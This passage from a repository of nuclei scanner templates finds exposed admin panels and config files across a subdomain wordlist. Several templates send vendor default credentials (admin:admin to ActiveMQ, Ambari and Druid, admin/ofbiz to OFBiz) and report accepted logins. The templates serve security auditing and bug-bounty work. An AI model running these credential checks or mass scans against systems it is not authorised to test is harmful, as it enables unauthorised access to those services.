24 | - "symfony/profiler/"
25 | condition: and
26 | part: body
--------------------------------------------------------------------------------
/Templates/Configuration-Files/web-config.yaml:
--------------------------------------------------------------------------------
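# Checks whether an ASP.NET web.config file is served from the web root.
# A hit needs HTTP 200 and both configuration elements in the response.
id: web-config
info:
  name: Web Config file
  author: Yash Anand @yashanand155
  severity: info
  tags: config,exposure

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /web.config HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55

    # Both matchers must succeed.
    matchers-condition: and
    matchers:
      - type: word
        words:
          # The listing showed two empty list entries here, which leaves only
          # the status check. Any host answering 200 for /web.config (for
          # example with a custom error page) would be reported. The element
          # names were presumably stripped when the page was rendered.
          # NOTE(review): the values below follow the upstream web-config
          # template; confirm against the repository file.
          - '<configuration>'
          - '<system.web>'
        condition: and

      - type: status
        status:
          - 200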
--------------------------------------------------------------------------------
/Templates/Configuration-Files/xprober-service.yaml:
--------------------------------------------------------------------------------
# Looks for an exposed X Prober page (/xprober.php), which the template's name
# describes as leaking server information.
id: xprober-service

info:
  name: X Prober server information leakage
  author: pdteam
  severity: low
  tags: config,exposure
  reference: https://twitter.com/bugbounty_tips/status/1339984643517423616

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /xprober.php HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
    matchers:
      # Both words are required, but the second is a substring of the first,
      # so the first entry alone decides the outcome. There is no status check.
      - type: word
        condition: and
        words:
          - '"appName":"X Prober"'
          - 'X Prober'
--------------------------------------------------------------------------------
/Templates/Default-Login/activemq-default-login.yaml:
--------------------------------------------------------------------------------
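# Requests the ActiveMQ web console at /admin/ with HTTP Basic credentials and
# reports when the console's welcome page comes back.
# A hit means the console still accepts the vendor default account; the fix is
# to change the console password and restrict who can reach /admin/.
id: activemq-default-login

info:
  name: Apache ActiveMQ Default Credentials
  author: pdteam
  severity: medium
  tags: apache,activemq,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      # The Authorization value is base64 for admin:admin.
      - |
        GET /admin/ HTTP/1.1
        Host: {{Subdomains}}
        Authorization: Basic YWRtaW46YWRtaW4=
    matchers:
      # The second word was split across two lines in the listing, leaving a
      # line break inside the quoted scalar; it is rejoined here.
      # NOTE(review): the trailing space in the first word and the broken second
      # word suggest HTML tags were stripped from this page -- compare both
      # strings with the original template before use. There is no status check.
      - type: word
        condition: and
        words:
          - 'Welcome to the Apache ActiveMQ Console of '
          - 'Broker'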
--------------------------------------------------------------------------------
/Templates/Default-Login/ambari-default-credentials.yaml:
--------------------------------------------------------------------------------
# Queries the Ambari REST API for the admin user with HTTP Basic credentials and
# reports when user and privilege data is returned.
# A hit means the default admin password was never changed on that instance.
id: ambari-default-credentials

info:
  name: Apache Ambari Default Credentials
  author: pdteam
  severity: medium
  tags: ambari,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      # The Authorization value is base64 for admin:admin.
      - |
        GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1
        Host: {{Subdomains}}
        Authorization: Basic YWRtaW46YWRtaW4=
    matchers:
      # Both strings must appear in the response; no status matcher is set.
      - type: word
        condition: and
        words:
          - '"Users" : {'
          - 'AMBARI.'
--------------------------------------------------------------------------------
/Templates/Default-Login/druid-default-password-1.yaml:
--------------------------------------------------------------------------------
# Posts admin/admin to the Druid monitor login under the /druid/ prefix and
# reports when the endpoint answers 200 with "success".
# NOTE(review): the id contains a space; newer nuclei releases are understood to
# validate ids against a pattern without spaces -- confirm, and consider the
# hyphenated form used in the file name.
id: druid-default-password 1

info:
  name: Druid Default Password
  author: pikpikcu
  severity: high
  tags: druid,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /druid/submitLogin HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername=admin&loginPassword=admin
    matchers-condition: and
    matchers:

      # Anchored on both ends: the matched text has to be exactly "success",
      # which keeps error pages that merely mention the word from matching.
      - type: regex
        regex:
          - "^success$"

      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Default-Login/druid-default-password-2.yaml:
--------------------------------------------------------------------------------
# Posts admin/admin to /submitLogin (the Druid monitor login without the
# /druid/ prefix) and reports when the endpoint answers 200 with "success".
# NOTE(review): the id contains a space; newer nuclei releases are understood to
# validate ids against a pattern without spaces -- confirm, and consider the
# hyphenated form used in the file name.
id: druid-default-password 2

info:
  name: Druid Default Password
  author: pikpikcu
  severity: high
  tags: druid,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /submitLogin HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded

        loginUsername=admin&loginPassword=admin
    matchers-condition: and
    matchers:

      # Anchored on both ends: the matched text has to be exactly "success".
      - type: regex
        regex:
          - "^success$"

      - type: status
        status:
          - 200
--------------------------------------------------------------------------------
/Templates/Default-Login/ofbiz-default-credentials.yaml:
--------------------------------------------------------------------------------
# Posts the admin/ofbiz account to the OFBiz login controller and reports when
# the response contains both marker strings.
# ofbiz-default-login.yaml in the same directory sends the identical request.
id: ofbiz-default-credentials

info:
  name: Apache OfBiz Default Credentials
  author: pdteam
  severity: medium
  tags: ofbiz,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /control/login HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
    matchers:
      # NOTE(review): confirm that neither string is also present on the
      # failed-login page; if one is, any OFBiz instance would be reported
      # whether or not the credentials were accepted. No status matcher is set.
      - type: word
        condition: and
        words:
          - "ofbiz-pagination-template"
          - "Powered by OFBiz"
--------------------------------------------------------------------------------
/Templates/Default-Login/ofbiz-default-login.yaml:
--------------------------------------------------------------------------------
# Posts the admin/ofbiz account to the OFBiz login controller and reports when
# the response contains both marker strings.
# Same request and words as ofbiz-default-credentials.yaml in this directory;
# running both reports each finding twice under different ids.
id: ofbiz-default-login

info:
  name: Apache OfBiz Default Login
  author: pdteam
  severity: medium
  tags: ofbiz,default-login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST /control/login HTTP/1.1
        Host: {{Subdomains}}
        Content-Type: application/x-www-form-urlencoded

        USERNAME=admin&PASSWORD=ofbiz&FTOKEN=&JavaScriptEnabled=Y
    # With a single matcher in the list this setting changes nothing.
    matchers-condition: and
    matchers:
      # NOTE(review): confirm that neither string is also present on the
      # failed-login page; otherwise the result says nothing about the password.
      - type: word
        condition: and
        words:
          - "ofbiz-pagination-template"
          - "Powered by OFBiz"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/active-admin-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: active-admin-exposure
2 |
3 | info:
4 | name: ActiveAdmin Admin Dasboard Exposure
5 | author: pdteam
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "active_admin_content"
23 | - "active_admin-"
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/activemq-panel.yaml:
--------------------------------------------------------------------------------
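# Requests / and reports when the ActiveMQ landing page text is present.
id: activemq-panel

info:
  name: Apache ActiveMQ Exposure
  author: pdteam
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
    matchers:
      # The first word was split across two lines in the listing, leaving a
      # line break inside the quoted scalar; it is rejoined here.
      # NOTE(review): the break suggests HTML tags were stripped from this page;
      # compare both strings with the original template. As shown, the second
      # word is a substring of the first, so it adds no extra evidence.
      - type: word
        condition: and
        words:
          - 'Welcome to the Apache ActiveMQ!'
          - 'Apache ActiveMQ'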
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-component-login-1.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-component-login 1
2 |
3 | info:
4 | name: Adobe Component Brower Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6846
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cfide/componentutils/login.cfm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Component Browser Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-component-login-2.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-component-login 2
2 |
3 | info:
4 | name: Adobe Component Brower Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6846
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /CFIDE/componentutils/login.cfm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Component Browser Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-connect-central-login.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-connect-central-login
2 |
3 | info:
4 | name: Adobe Connect Central Login
5 | author: dhiyaneshDk
6 | severity: info
7 | tags: adobe,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /system/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - 'Adobe Connect Central Login'
24 | part: body
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-experience-manager-login.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-experience-manager-login
2 |
3 | info:
4 | name: Adobe-Experience-Manager
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22AEM+Sign+In%22
8 | tags: panel,aem
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /libs/granite/core/content/login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'AEM Sign In'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/adobe-media-server.yaml:
--------------------------------------------------------------------------------
1 | id: adobe-media-server
2 |
3 | info:
4 | name: Adobe Media Server
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.shodan.io/search?query=http.title%3A%22Adobe+Media+Server%22
8 | tags: panel,adobe
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET / HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Adobe Media Server'
25 |
26 | - type: status
27 | status:
28 | - 200
29 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/advance-setup.yaml:
--------------------------------------------------------------------------------
1 | id: advance-setup-login
2 |
3 | info:
4 | name: Advance Setup Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6819
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /cgi-bin/webcm?getpage=../html/login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Advanced Setup - Security - Admin User Name & Password'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/aims-password-mgmt-client.yaml:
--------------------------------------------------------------------------------
1 | id: aims-password-mgmt-client
2 |
3 | info:
4 | name: Aims Password Management Client Detect
5 | author: iamthefrogy
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /aims/ps/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Avatier Corporation"
23 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/aims-password-portal.yaml:
--------------------------------------------------------------------------------
1 | id: aims-password-portal
2 |
3 | info:
4 | name: AIMS Password Management Portal
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6576
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /aims/ps/default.aspx HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Password Management Client'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/airflow-panel.yaml:
--------------------------------------------------------------------------------
1 | id: airflow-panel
2 |
3 | info:
4 | name: Airflow Admin login
5 | author: pdteam
6 | severity: info
7 | tags: panel,apache,airflow
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /admin/airflow/login HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 |
22 | - type: word
23 | part: body
24 | words:
25 | - "Airflow - Login"
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/akamai-cloudtest.yaml:
--------------------------------------------------------------------------------
1 | id: akamai-cloudtest
2 |
3 | info:
4 | name: Akamai CloudTest Panel
5 | author: emadshanab
6 | severity: info
7 | tags: panel,akamai
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /concerto/Login?goto=Central HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "Akamai Inc. All rights reserved"
24 | - "Akamai CloudTest"
25 | condition: and
26 |
27 | - type: status
28 | status:
29 | - 200
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ambari-exposure.yaml:
--------------------------------------------------------------------------------
# Requests / and reports when the page mentions Ambari and links the Apache
# License 2.0.
id: ambari-exposure

info:
  name: Apache Ambari Exposure / Unauthenticated Access
  author: pdteam
  severity: medium
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
    matchers:
      # NOTE(review): these strings identify an Ambari page but do not by
      # themselves show that access is unauthenticated, as the name implies;
      # a login page carrying the same text would presumably match as well.
      # Treat a hit as "Ambari is reachable" and verify authentication manually.
      - type: word
        condition: and
        words:
          - 'Ambari'
          - 'href="http://www.apache.org/licenses/LICENSE-2.0"'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/ansible-tower-exposure.yaml:
--------------------------------------------------------------------------------
1 | id: ansible-tower-exposure
2 |
3 | info:
4 | name: Ansible Tower Exposure
5 | author: pdteam
6 | severity: low
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET / HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "Ansible Tower"
23 | - "ansible-main-menu"
24 | condition: and
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/apiman-panel.yaml:
--------------------------------------------------------------------------------
# Detects an Apiman instance from the redirect that /apimanui/api-manager
# issues towards its login realm.
id: apiman-panel

info:
  name: Apiman Instance Detection Template
  author: righettod
  severity: info
  description: Try to detect the presence of a Apiman instance via the login redirection
  tags: panel,apiman

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /apimanui/api-manager HTTP/1.1
        Host: {{Subdomains}}
    # The match is made on the redirect itself (302 plus the realm path in a
    # response header), so it only works while redirects are not followed.
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 302

      - type: word
        part: header
        words:
          - "/auth/realms/apiman"
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/atlassian-crowd-panel.yaml:
--------------------------------------------------------------------------------
# Requests the Atlassian Crowd console login page and looks for its title text.
id: atlassian-crowd-panel

info:
  name: Atlassian Crowd panel detect
  author: organiccrap
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /crowd/console/login.action HTTP/1.1
        Host: {{Subdomains}}
    # Only one matcher is listed, so this setting has no effect; there is no
    # status matcher to combine it with.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - Atlassian Crowd - Login
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/bazarr-login.yaml:
--------------------------------------------------------------------------------
# Requests /login and reports when the response contains the word "Bazarr".
id: bazarr-login-detect

info:
  name: Bazarr Login Detect
  author: r3dg33k
  severity: info
  reference: https://www.bazarr.media/
  tags: panel,bazarr,login

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET /login HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
    matchers:
      # NOTE(review): a single product name with no status or second marker;
      # any page at /login that mentions "Bazarr" is reported. Pairing it with
      # a status matcher or a more specific string would cut false positives.
      - type: word
        words:
          - 'Bazarr'
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/bitrix-panel.yaml:
--------------------------------------------------------------------------------
1 | id: bitrix-login
2 |
3 | info:
4 | name: Bitrix Login Panel
5 | author: juicypotato1
6 | severity: info
7 | tags: panel,bitrix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /bitrix/admin/ HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "USER_LOGIN"
24 | - "/bitrix/js/main/"
25 | part: body
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/blue-iris-login.yaml:
--------------------------------------------------------------------------------
1 | id: blue-iris-login
2 |
3 | info:
4 | name: Blue Iris Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6814
8 | tags: panel
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.htm HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Blue Iris Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/calendarix-panel-1.yaml:
--------------------------------------------------------------------------------
1 | id: calendarix-panel 1
2 |
3 | info:
4 | name: Calendarix login detect
5 | author: r3dg33k
6 | severity: info
7 | tags: panel,calendarix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /calendarix/admin/cal_login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - 'Calendarix Admin Login'
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/calendarix-panel-2.yaml:
--------------------------------------------------------------------------------
1 | id: calendarix-panel 2
2 |
3 | info:
4 | name: Calendarix login detect
5 | author: r3dg33k
6 | severity: info
7 | tags: panel,calendarix
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /calendar/admin/cal_login.php HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: status
22 | status:
23 | - 200
24 | - type: word
25 | words:
26 | - 'Calendarix Admin Login'
27 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/call-break-cms.yaml:
--------------------------------------------------------------------------------
# Requests / and reports when the response contains "Call Break CMS".
id: call-break-cms

info:
  name: Call Break CMS
  author: dhiyaneshDk
  severity: info
  tags: panel

requests:
  - payloads:
      # NOTE(review): hard-coded absolute path; not portable across machines.
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        GET / HTTP/1.1
        Host: {{Subdomains}}
    matchers:
      # "condition: and" has nothing to combine here: only one word is listed.
      # No status matcher is set.
      - type: word
        condition: and
        words:
          - 'Call Break CMS'

--------------------------------------------------------------------------------
/Templates/Exposed-Panels/checkmarx-panel.yaml:
--------------------------------------------------------------------------------
1 | id: checkmarx-panel-detect
2 |
3 | info:
4 | name: Checkmarx WebClient detector
5 | author: joanbono
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /cxwebclient/Login.aspx HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - '/CxWebClient/webApp/Scripts/libs/authenticationScripts'
23 | part: body
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-asa-panel.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-asa-panel-detect
2 |
3 | info:
4 | name: Cisco ASA VPN panel detect
5 | author: organiccrap
6 | severity: info
7 | tags: cisco,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /+CSCOE+/logon.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers:
20 | - type: word
21 | words:
22 | - "SSL VPN Service"
23 | part: body
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-finesse-login.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-finesse-login
2 |
3 | info:
4 | name: Cisco Finesse Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/6824
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /desktop/container/landing.jsp?locale=en_US HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Sign in to Cisco Finesse'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-integrated-login.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-integrated-login
2 |
3 | info:
4 | name: Cisco Integrated Management Controller Login
5 | author: dhiyaneshDK
6 | severity: info
7 | reference: https://www.exploit-db.com/ghdb/3859
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login.html HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 | - type: word
23 | words:
24 | - 'Cisco Integrated Management Controller Login'
25 | - type: status
26 | status:
27 | - 200
28 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-sd-wan.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-sd-wan
2 |
3 | info:
4 | name: Cisco SD-WAN panel
5 | author: z3bd
6 | severity: info
7 | reference: https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj
8 | tags: panel,cisco
9 |
10 | requests:
11 | - payloads:
12 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
13 | attack: sniper
14 | threads: 100
15 |
16 | raw:
17 | - |
18 | GET /login HTTP/1.1
19 | Host: {{Subdomains}}
20 | matchers-condition: and
21 | matchers:
22 |
23 | - type: status
24 | status:
25 | - 200
26 |
27 | - type: word
28 | words:
29 | - "SD-Wan Center"
30 | part: body
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/cisco-secure-desktop.yaml:
--------------------------------------------------------------------------------
1 | id: cisco-secure-desktop
2 |
3 | info:
4 | name: Cisco Secure Desktop
5 | author: pdteam
6 | severity: info
7 | tags: cisco,panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /CACHE/sdesktop/install/start.htm HTTP/1.1
18 | Host: {{Subdomains}}
19 | matchers-condition: and
20 | matchers:
21 | - type: word
22 | words:
23 | - "Installation"
24 | - "WebLaunch"
25 | part: body
26 | condition: and
27 |
28 | - type: status
29 | status:
30 | - 200
31 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-adc-gateway-detect-1.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-adc-gateway-panel 1
2 |
3 | info:
4 | name: Citrix ADC Gateway detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /logon/LogonPoint/index.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
23 | - _ctxstxt_CitrixCopyright
24 |
--------------------------------------------------------------------------------
/Templates/Exposed-Panels/citrix-adc-gateway-detect-2.yaml:
--------------------------------------------------------------------------------
1 | id: citrix-adc-gateway-panel 2
2 |
3 | info:
4 | name: Citrix ADC Gateway detect
5 | author: organiccrap
6 | severity: info
7 | tags: panel
8 |
9 | requests:
10 | - payloads:
11 | Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
12 | attack: sniper
13 | threads: 100
14 |
15 | raw:
16 | - |
17 | GET /logon/LogonPoint/custom.html HTTP/1.1
18 | Host: {{Subdomains}}
19 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
20 | matchers:
21 | - type: word
22 | words:
